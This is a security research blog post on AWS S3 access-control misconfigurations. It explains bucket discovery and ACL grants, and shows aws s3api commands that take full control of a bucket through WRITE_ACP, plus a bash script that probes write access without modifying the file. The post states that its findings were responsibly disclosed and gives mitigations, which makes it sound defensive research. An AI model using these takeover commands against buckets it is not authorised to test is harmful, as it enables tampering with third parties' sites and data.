AI agents building security tests – architecture and prompts
The Detectify AI Agent Alfred fully automates the creation of security tests for new vulnerabilities, from research to a merge request. In its first six …
Frans Rosén
TL;DR: Setting up access control of AWS S3 consists of multiple levels, each with its own unique risk of misconfiguration. We will go through the specifics of each level and identify the dangerous cases where weak ACLs can create vulnerable configurations impacting the owner of the S3-bucket and/or through third party assets used by a lot of companies. We also show how to do it properly and how to monitor for these sorts of issues.
A simplified version of this write-up is available on the Detectify blog.
Amazon Web Services (AWS) provides a service called Simple Storage Service (S3) which exposes a storage container interface. The storage container is called a “bucket” and the files inside the bucket are called “objects”. S3 provides an unlimited storage for each bucket and owners can use them to serve files. Files can be served either privately (via signed URLs) or publicly via an appropriately configured ACL (Access Control List) or ACP (Access Control Policy).
AWS also provides a (CDN) service called CloudFront which is often configured to quickly serve S3 hosted files/objects from an optimized CloudFront server as close as possible to the user who is requesting the file.
Recently, a few blog posts have mentioned scenarios where the misconfiguration of a S3 bucket may expose sensitive data as well as explaining that the S3 access control lists (ACL) are quite different to the regular user permission setup in AWS which is called Identify Access Management (IAM).
However, we decided to approach this from a different angle. By identifying a number of different misconfigurations we discovered that we could suddenly control, monitor and break high end websites due to weak configurations of the bucket and object ACLs.
All instances disclosed below were reported to the affected parties using responsible disclosure policies. In some of the cases, third party companies were involved and we got assistance from the companies affected to contact the vulnerable party.
We do not recommend testing any of the vulnerable scenarios below without prior approval. This is especially important in scenarios where the only way to identify the vulnerability was to actually override files and configurations. We did, however, identify one method to detect one of the vulnerable setups without actually modifying the data. You should still make sure you’re not affecting any party that has not given you written approval.
The different misconfigurations and the impact of each depend on the following criteria:
We will try to go through all different cases below and explain when they can be created with a vulnerable misconfiguration.
To start off, we need to be able to identify buckets owned by or used by the company. We need the specific bucket’s name to make signed requests to the bucket.
Identifying a bucket depends on the setup and also how the bucket is being reached: The request can go directly to S3, to CloudFront (or any other CDN proxy serving files from the bucket), to the S3 “Static Website” option, or more.
Some methods to identify S3-buckets are:
Server
-header which says AmazonS3
.Access Denied
or NoSuchKey
:<Name>
-element.We have identified multiple ways to make an S3-bucket actually reveal itself independent of proxies in front of it. We have notified AWS about these methods and chosen not mention them above.
If you do find a domain that is pointing to a bucket, but cannot get the bucket name, try the actual fully qualified domain name (FQDN) as the bucket name, this is a common setup, having the bucket named as the domain that is pointing to it.
If this doesn’t work, try to:
media.acme.edu
, try media.acme.edu
, acme-edu-media
, acme-audio
or acme-media
.If the response on $bucket.s3.amazonaws.com
shows NoSuchBucket
you know the bucket doesn’t exist. An existing bucket will either give you ListBucketResult
or AccessDenied
.
(You might also stumble upon AllAccessDisabled
, these buckets are completely dead).
Remember, just because a bucket is named as the company or similar, that doesn’t mean it is owned by that company. Try find references directly from the company to the bucket to confirm it is indeed owned by the specific company.
First, we will explore the different options that can be used for giving access to a requester of a bucket and the objects within:
You are able to give access to a single user inside AWS using either the AWS user ID or their email address. This makes sense if you want to allow a single user to have specific access to the bucket.
This is probably the most misunderstood predefined group in AWS S3’s ACL. Having the ACL set to AuthenticatedUsers
basically means “Anyone with a valid set of AWS credentials”. All AWS accounts that can sign a request properly are inside this group. The requester doesn’t need to have any relation at all with the AWS account owning the bucket or the object. Remember that “authenticated” is not the same thing as “authorized”.
This grant is likely the most common reason a bucket is found vulnerable in the first place.
When this grant is set, the requester doesn’t even need to make an authenticated request to read or write any data, anyone can make a PUT request to modify or a GET request to download an object, depending on the policy that is configured.
The following policy permissions can be set on the bucket or on objects inside the bucket.
The ACPs on bucket and objects control different parts of S3. AWS has a list showing exactly what each grant does. There are more cases not mentioned below where you can create specific IAM policies for a bucket, called a bucket-policy. Creating a bucket-policy has its own issues, however, we will only cover the standard setup of ACLs set on buckets and objects.
This gives the ability to read the content. If this ACP is set on a bucket, the requester can list the files inside the bucket. If the ACP is set on an object, the content can be retrieved by the requester.
READ
will still work on specific objects inside a bucket, even if Object Access READ
is not set on the complete bucket.
With the following ACL setup inside AWS S3:
Bucket-ACL:![]() |
Object-ACL:![]() |
We can still read the specific object:
$ aws s3api get-object --bucket test-bucket --key read.txt read.txt { "AcceptRanges": "bytes", "ContentType": "text/plain", "LastModified": "Sun, 09 Jul 2017 21:14:15 GMT", "ContentLength": 43, "ETag": ""1398e667c7ebaa95284d4efa2987c1c0"", "Metadata": {} }
This means READ
can be different for each object, independently of the settings on the bucket.
This permission gives the ability to read the access control list of the bucket or object. If this is enabled, you can identify vulnerable assets without trying to modify the content or ACP at all.
READ_ACP
will still work on specific objects inside a bucket, even if Object Access READ_ACP
is not set on the complete bucket.
Bucket-ACL:![]() |
Object-ACL:![]() |
$ aws s3api get-object-acl --bucket test-bucket --key read-acp.txt { "Owner": { "DisplayName": "fransrosen", ...
This means READ_ACP
can be different for each object, independently of the settings on the bucket.
This permission gives the ability to write content. If the bucket has this enabled for a user or group, that party can upload, modify and create new files.
WRITE
will not work on specific objects inside a bucket, if Object Access WRITE
is not set on the complete bucket:
Bucket-ACL:![]() |
Object-ACL:![]() |
$ aws s3api put-object --bucket test-bucket --key write.txt --body write.txt An error occurred (AccessDenied) when calling the PutObject operation: Access Denied
However, if WRITE
is set on the bucket, all objects will obey and will not be able to decide individually if they should be writable or not:
Bucket-ACL:![]() |
Object-ACL:![]() |
$ aws s3api put-object --bucket test-bucket --key write.txt --body write.txt { "ETag": ""1398e667c7ebaa95284d4efa2987c1c0"" }
This means, WRITE
can be verified on the bucket in two ways, either by uploading a random file, or by modifying an existing one. Modifying an existing file is destructive and should not be done at all. Below we will explain a way to check this without doing a destructive call, by triggering an error in between the access control check and the actual modification of the file.
This permission gives the ability to modify the permission ACL of a bucket or object.
If the bucket has this enabled for a user or a group, that party can modify the ACL of the bucket which is extremely bad. Having WRITE_ACP
on a bucket will completely expose it to be controlled by the party having the ACP set, meaning any content of any object can now be controlled by the party. The attacker might not be able to READ every object already in the bucket, but they can still fully modify the existing objects. Also, the initial owner of the S3-bucket will get an Access Denied in the new AWS S3-console when the attacker is claiming ownership of it when removing the READ-access on the bucket.
First, no access to READ_ACP
or WRITE
:
$ aws s3api get-bucket-acl --bucket test-bucket An error occurred (AccessDenied) when calling the GetBucketAcl operation: Access Denied $ aws s3api put-object --bucket test-bucket --key write-acp.txt --body write-acp.txt An error occurred (AccessDenied) when calling the PutObject operation: Access Denied
Then we try to change the bucket ACL:
$ aws s3api put-bucket-acl --bucket test-bucket --grant-full-control emailaddress=frans@example.com && echo "success" success
The initial owner of the bucket will now see this:
(Being the owner, they will still be able to modify the policy of the bucket, but this is a weird case anyway.)
We can now control everything:
$ aws s3api get-bucket-acl --bucket test-bucket { ... "Grants": [ { "Grantee": { "Type": "CanonicalUser", "DisplayName": "frans", "ID": "..." }, "Permission": "FULL_CONTROL" $ aws s3api put-object --bucket test-bucket --key write-acp.txt --body write-acp.txt { "ETag": ""1398e667c7ebaa95284d4efa2987c1c0"" }
A very interesting thing is that WRITE_ACP
will actually still work on specific objects inside a bucket even if Object Access WRITE_ACP
is not set on the complete bucket:
Bucket-ACL:![]() |
Object-ACL:![]() |
$ aws s3api put-object-acl --bucket test-bucket --key write-acp.txt --grant-write-acp uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers && echo "success" success
Also, the opposite of WRITE
applies here, having WRITE_ACP
on the bucket, doesn’t mean you directly have WRITE_ACP
on an object:
Bucket-ACL:![]() |
Object-ACL:![]() |
$ aws s3api put-object-acl --bucket test-bucket --key write-acp.txt --grant-full-control emailaddress=frans@example.com An error occurred (AccessDenied) when calling the PutObjectAcl operation: Access Denied
However, by performing the following steps when having WRITE_ACP
on the bucket you will still gain full access of the content of any object, by replacing the existing object with new content:
$ aws s3api put-bucket-acl --bucket test-bucket --grant-full-control emailaddress=frans@example.com && echo "success" success
$ aws s3api put-object --bucket test-bucket --key write-acp.txt --body write-acp.txt { "ETag": ""1398e667c7ebaa95284d4efa2987c1c0"" }
$ aws s3api put-object-acl --bucket test-bucket --key write1.js --grant-full-control emailaddress=frans@example.com && echo "success" success
Since WRITE
still needs to be set on the bucket, you cannot upgrade a WRITE_ACP
on an object to give yourself WRITE
on the same object:
$ aws s3api put-object-acl --bucket test-bucket --key write-acp.txt --grant-write-acp uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers --grant-write uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers --grant-read-acp uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers --grant-read uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers && echo "success" success
Bucket-ACL:![]() |
Object-ACL:![]() |
This will still give you:
$ aws s3api put-object --bucket test-bucket --key write-acp.txt --body write-acp.txt An error occurred (AccessDenied) when calling the PutObject operation: Access Denied
However, you can still remove all ACPs on the object, making the object completely private, which will stop it being served, giving a 403 Forbidden
.
WRITE_ACP
can unfortunately only be verified by testing writing a new ACP on a bucket or object. Modifying the existing one is of course destructive and should not be done without approval. We have not found a non-destructive way of testing this ACP.
This is the policy that combines all other policies. However, WRITE
will still not work on an object unless the bucket has it set, even if this permission is set on an object.
The following scenarios are cases where the company can be affected.
You found a bucket which is served by a subdomain or domain of the company.
AllUsers
or AuthenticatedUsers
has WRITE_ACP
set, we know we can gain full control over the bucket, without doing anything else.Content-MD5
telling AWS the checksum of the content being uploaded. It turns out that this check is happening inside the following flow:
Since the checksum control happens after we know that we have access to the file, but before actually modifying it, we do not need to write to the file to know that we are able to.
The following bash code simulates this scenario:
# use this by: ./put-simulate.sh test-bucket/write.txt AWS_ACCESS_KEY_ID="***" AWS_SECRET_ACCESS_KEY="***" AWS_S3_BUCKET="$(echo "$1" | cut -d "/" -f1)" AWS_PATH="/$(echo "$1" | cut -d "/" -f2-)" date=$(date +"%a, %d %b %Y %T %z") acl="x-amz-acl:private" content_type='application/octet-stream' # we create a checksum of the word "yepp", but will upload a file with the content "nope". content_md5=$(openssl dgst -md5 -binary <(echo "yepp") | openssl enc -base64) string="PUTn${content_md5}n${content_type}n${date}n${acl}n/${AWS_S3_BUCKET}${AWS_PATH}" signature=$(echo -en "${string}" | openssl sha1 -hmac "${AWS_SECRET_ACCESS_KEY}" -binary | base64) echo "PUT to S3 with invalid md5: ${AWS_S3_BUCKET}${AWS_PATH}" result=$(curl -s --insecure -X PUT --data "nope" -H "Host: ${AWS_S3_BUCKET}.s3.amazonaws.com" -H "Date: $date" -H "Content-Type: ${content_type}" -H "Content-MD5: ${content_md5}" -H "$acl" -H "Authorization: AWS ${AWS_ACCESS_KEY_ID}:${signature}" "https://${AWS_S3_BUCKET}.s3.amazonaws.com${AWS_PATH}") if [ "$(echo ${result} | grep 'The Content-MD5 you specified did not match what we received')" != "" ]; then echo "SUCCESS: ${AWS_S3_BUCKET}${AWS_PATH}" exit 0 fi echo "$result" exit 1
On a bucket we can upload to, this will result in:
$ ./put-simulate.sh test-bucket/write.txt PUT to S3 with invalid md5: test-bucket/write.txt SUCCESS: test-bucket/write.txt
On a bucket we cannot upload to, this will result in:
$ ./put-simulate.sh test-secure-bucket/write.txt PUT to S3 with invalid md5: test-secure-bucket/write.txt <?xml version="1.0" encoding="UTF-8"?> <Error><Code>AccessDenied</Code><Message>Access Denied</Message>
We will therefore never modify the content, only confirm we can do it. This unfortunately only works on WRITE
on objects, not on WRITE_ACP
as far as we know.
WRITE_ACP
even though you do not have access to READ_ACP
.$key
and the Content-type
. Depending on if they use starts-with
you might be able to modify the content type to HTML/XML/SVG or similar, or change the location of the file being uploaded.Additional Disclaimer: The assets being used by a company might not always be owned by the company. You need to be extremely careful here not to attack anyone other than the intended target who has given you permission to test.
There are projects trying to automate this, such as Second Order. However, Second Order only checks for assets being referenced in the HTTP-response, files being loaded dynamically are not being checked. Below is a quick example of also checking for dynamically loaded assets using Headless Chrome.
First, start the headless version on port 9222:
"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --remote-debugging-port=9222 --disable-gpu --headless
We can then use a small script. (context.js is borrowed from the HAR-capturer-project since that one properly closes tabs)
const CDP = require('chrome-remote-interface'); const URL = require('url').URL; const Context = require('./context'); async function log_requests(orig_url) { const context = new Context({}); process.on('SIGTERM', function () { context.destroy(); }); try { const client = await context.create(); const {Network, Page} = client; const ourl = new URL('http://' + orig_url); const ohost = ourl.host; Network.requestWillBeSent((params) => { if (params.request.url.match('^data:')) { return; } const url = new URL(params.request.url); console.log(ohost + ':' + url.host + ':' + params.request.url); }); await Promise.all([Network.enable(), Page.enable()]); await Page.navigate({url: 'http://' + orig_url}); await Page.loadEventFired(); await Page.navigate({url: 'https://' + orig_url}); await Page.loadEventFired(); } finally { await context.destroy(); } } const url = process.argv.slice(2)[0]; log_requests(url);
Which will give us all assets on the page which we then can use to figure out if they are served from S3 or not:
This one is a bit complicated. You need to have clear evidence and proof that the bucket is indeed owned by the company. Try to find references from the company pointing to this bucket, such as references on their website, CI logs or open source code.
During this research we were able to confirm we could control assets on high profile websites. We reported these issues directly and were able to get them solved quickly. The following categories of websites were affected:
We identified vulnerable assets placed on the login pages of some companies.
In some cases, vulnerable assets were loaded using Google Tag Manager (gtm.js) however, they did not sandbox the third parties properly, running the third party assets directly on the domain itself (not by sandboxing them using www.googletagmanager.com
)
We got in touch with some third party providers, both directly but also with help from the affected companies, quickly identifying the issue and solving it very fast.
The following processes can prevent this issue from happening:
WRITE
and WRITE_ACP
are only set on specific users, never on groups such as AllUsers
or AuthenticatedUsers
.WRITE_ACP
, test yourself by doing a aws s3api put-object-acl
with the appropriate settings using a restricted AWS-user against your own objects in your buckets. You might need to update the ACL on every object to mitigate this completely.It’s clear after this research that this problem is widespread and hard to identify and completely solve, especially if the company uses a huge amount of buckets, created by different systems. WRITE_ACP
is the most dangerous one for reasons mentioned, both on buckets and objects.
An interesting detail when manually uploading files to S3 using Cyberduck, changing the access control on a file looks like this:
Pretty easy to accidentally pick the wrong one there.
Until next time.
Detectify tests web applications for the following S3 misconfiguration vulnerabilities with a severity range between 4.4-9 on the CVSS scale:
The Detectify AI Agent Alfred fully automates the creation of security tests for new vulnerabilities, from research to a merge request. In its first six …
Combining response-type switching, invalid state and redirect-uri quirks using OAuth, with third-party javascript-inclusions has multiple vulnerable scenarios where authorization codes or tokens could leak to …